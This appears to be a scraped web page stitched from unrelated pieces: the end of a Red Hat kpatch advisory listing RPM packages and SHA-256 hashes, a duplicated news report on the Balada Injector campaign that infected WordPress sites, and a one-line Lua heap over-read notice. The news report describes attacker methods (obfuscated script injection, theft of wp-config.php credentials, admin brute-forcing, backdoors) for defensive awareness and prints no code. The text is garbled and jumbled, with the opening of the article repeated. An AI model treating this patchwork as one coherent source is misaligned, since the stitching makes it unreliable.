kpatch-patch-5\_14\_0-162\_6\_1-1-4.el9\_1.x86\_64.rpm

SHA-256: b10b9e430a64d54ca6b7161821339da57e739736b2c6800f112d7678fdc12da1

kpatch-patch-5\_14\_0-162\_6\_1-debuginfo-1-4.el9\_1.x86\_64.rpm

SHA-256: 783c525338d8fe051c61b3e079e06f24f6e51059a066f7756b7df19fee7ee916

kpatch-patch-5\_14\_0-162\_6\_1-debugsource-1-4.el9\_1.x86\_64.rpm

SHA-256: c0c492496b892443757ec839fc21442877de87427d83089c9d415e7a1e43a40a

**Red Hat Enterprise Linux for Power, little endian 9**

SRPM

kpatch-patch-5\_14\_0-162\_12\_1-1-3.el9\_1.src.rpm

SHA-256: 49afc2cd89257cc0e51ccb05dca5d617f5f93c2ed2c92ac2bcaf40dd6578522b

kpatch-patch-5\_14\_0-162\_18\_1-1-2.el9\_1.src.rpm

SHA-256: 1b05e11614d4826212f2e6f53e6219f739aeb6b47e7494152fea7733e34c904a

kpatch-patch-5\_14\_0-162\_22\_2-1-1.el9\_1.src.rpm

SHA-256: 89e8951458af7eed16e2b80b80a174fade77d763c9942e6168fbec12b82ce14f

kpatch-patch-5\_14\_0-162\_6\_1-1-4.el9\_1.src.rpm

SHA-256: a19b68f71dfa839602f2e0d73b181dbe1c56927d37c3035871ad898df467b48e

ppc64le

kpatch-patch-5\_14\_0-162\_12\_1-1-3.el9\_1.ppc64le.rpm

SHA-256: aa91c30f1769aa5ad4bde87e6784d10e82c84362f9974a30ec23a2ca64a2d87f

kpatch-patch-5\_14\_0-162\_12\_1-debuginfo-1-3.el9\_1.ppc64le.rpm

SHA-256: 8c0280861e1b6bb501131e865f9c7e78489dba2b2dcd054d7a9f736bf039549e

kpatch-patch-5\_14\_0-162\_12\_1-debugsource-1-3.el9\_1.ppc64le.rpm

SHA-256: b6049ea28a052c7e3a6d83f531880d177addaebc1803291f871f66e125887971

kpatch-patch-5\_14\_0-162\_18\_1-1-2.el9\_1.ppc64le.rpm

SHA-256: 73440c14b14652db20b64c3aa45fd54afd77cee37427a4765488977fef8c069c

kpatch-patch-5\_14\_0-162\_18\_1-debuginfo-1-2.el9\_1.ppc64le.rpm

SHA-256: e977b82541c6654711ad83440d68bbca0f7f55c7905b413fca22397a94d85324

kpatch-patch-5\_14\_0-162\_18\_1-debugsource-1-2.el9\_1.ppc64le.rpm

SHA-256: 7d66ce1f82cb72047d617eeae7d1426892c0e89204636c6f256c20a67c9a6e03

kpatch-patch-5\_14\_0-162\_22\_2-1-1.el9\_1.ppc64le.rpm

SHA-256: f47742476a93b5811bf6a0229ca298107eaf86ea2f4c9c94443a2d5df80aec5b

kpatch-patch-5\_14\_0-162\_22\_2-debuginfo-1-1.el9\_1.ppc64le.rpm

SHA-256: b9632110f94ac3682dd8c41ba4bd01299f9658d55db8dbf596d48d92c402b61d

kpatch-patch-5\_14\_0-162\_22\_2-debugsource-1-1.el9\_1.ppc64le.rpm

SHA-256: ffb9f4f8f0a462d59ae55920b36906f6887aa8fa75dde18686ae2781f221ecab

kpatch-patch-5\_14\_0-162\_6\_1-1-4.el9\_1.ppc64le.rpm

SHA-256: 4e03dfdac1b4bca7434e95bfc81c706b9bc37a455c2c5b7d8f0501726d5a18f7

kpatch-patch-5\_14\_0-162\_6\_1-debuginfo-1-4.el9\_1.ppc64le.rpm

SHA-256: a3ba84e2388c0080faa2005bf8bd8baf9cfa9d3148deb26d9b0d14b82196d02b

kpatch-patch-5\_14\_0-162\_6\_1-debugsource-1-4.el9\_1.ppc64le.rpm

SHA-256: 66072a35c5e2b8005f14f13a0d2eded274da6a67e2ab88e931cfa6a46c6a5225

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:1681: Red Hat Security Advisory: kpatch-patch security update

Over one million WordPress websites are estimated to have been infected by an ongoing campaign to deploy malware called Balada Injector since 2017.
The massive campaign, per GoDaddy's Sucuri, "leverages all known and recently discovered theme and plugin vulnerabilities" to breach WordPress sites. The attacks are known to play out in waves once every few weeks.
"This campaign is easily identified

Over one million WordPress websites are estimated to have been infected by an ongoing campaign to deploy malware called **Balada Injector** since 2017.

The massive campaign, per GoDaddy's Sucuri, "leverages all known and recently discovered theme and plugin vulnerabilities" to breach WordPress sites. The attacks are known to play out in waves once every few weeks.

"This campaign is easily identified by its preference for String.fromCharCode obfuscation, the use of freshly registered domain names hosting malicious scripts on random subdomains, and by redirects to various scam sites," security researcher Denis Sinegubko said.

The websites include fake tech support, fraudulent lottery wins, and rogue CAPTCHA pages urging users to turn on notifications to 'Please Allow to verify, that you are not a robot,' thereby enabling the actors to send spam ads.

The report builds on recent findings from Doctor Web, which detailed a Linux malware family that exploits flaws in more than two dozen plugins and themes to compromise vulnerable WordPress sites.

In the interim years, Balada Injector has relied on over 100 domains and a plethora of methods to take advantage of known security flaws (e.g., HTML injection and Site URL), with the attackers primarily attempting to obtain database credentials in the wp-config.php file.

Additionally, the attacks are engineered to read or download arbitrary site files – including backups, database dumps, log and error files – as well as search for tools like adminer and phpmyadmin that could have been left behind by site administrators upon completing maintenance tasks.

The malware ultimately allows for the generation of fake WordPress admin users, harvest data stored in the underlying hosts, and leave backdoors for persistent access.

Balada Injector further carries out broad searches from top-level directories associated with the compromised website's file system to locate writable directories that belong to other sites.

"Most commonly, these sites belong to the webmaster of the compromised site and they all share the same server account and the same file permissions," Sinegubko said. "In this manner, compromising just one site can potentially grant access to several other sites 'for free.'"

Should these attack pathways turn out to be unavailable, the admin password is brute-forced using a set of 74 predefined credentials. WordPress users are, therefore, recommended to keep their website software up-to-date, remove unused plugins and themes, and use strong WordPress admin passwords.

UPCOMING WEBINAR

Learn to Secure the Identity Perimeter - Proven Strategies

Improve your business security with our upcoming expert-led cybersecurity webinar: Explore Identity Perimeter strategies!

Don't Miss Out – Save Your Seat!

The findings come weeks after Palo Alto Networks Unit 42 unearthed a similar malicious JavaScript injection campaign that redirects site visitors to adware and scam pages. More than 51,000 websites have been affected since 2022.

The activity, which also employs String.fromCharCode as an obfuscation technique, leads victims to booby-trapped pages that trick them into enabling push notifications by masquerading as a fake CAPTCHA check to serve deceptive content.

"The injected malicious JS code was included on the homepage of more than half of the detected websites," Unit 42 researchers said. "One common tactic used by the campaign's operators was to inject malicious JS code on frequently used JS filenames (e.g., jQuery) that are likely to be included on the homepages of compromised websites."

"This potentially helps attackers target the website's legitimate users, since they are more likely to visit the website's home page."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Over 1 Million WordPress Sites Infected by Balada Injector Malware Campaign

In Lua 5.4.3, an erroneous finalizer called during a tail call leads to a heap-based buffer over-read.

Tag

#linux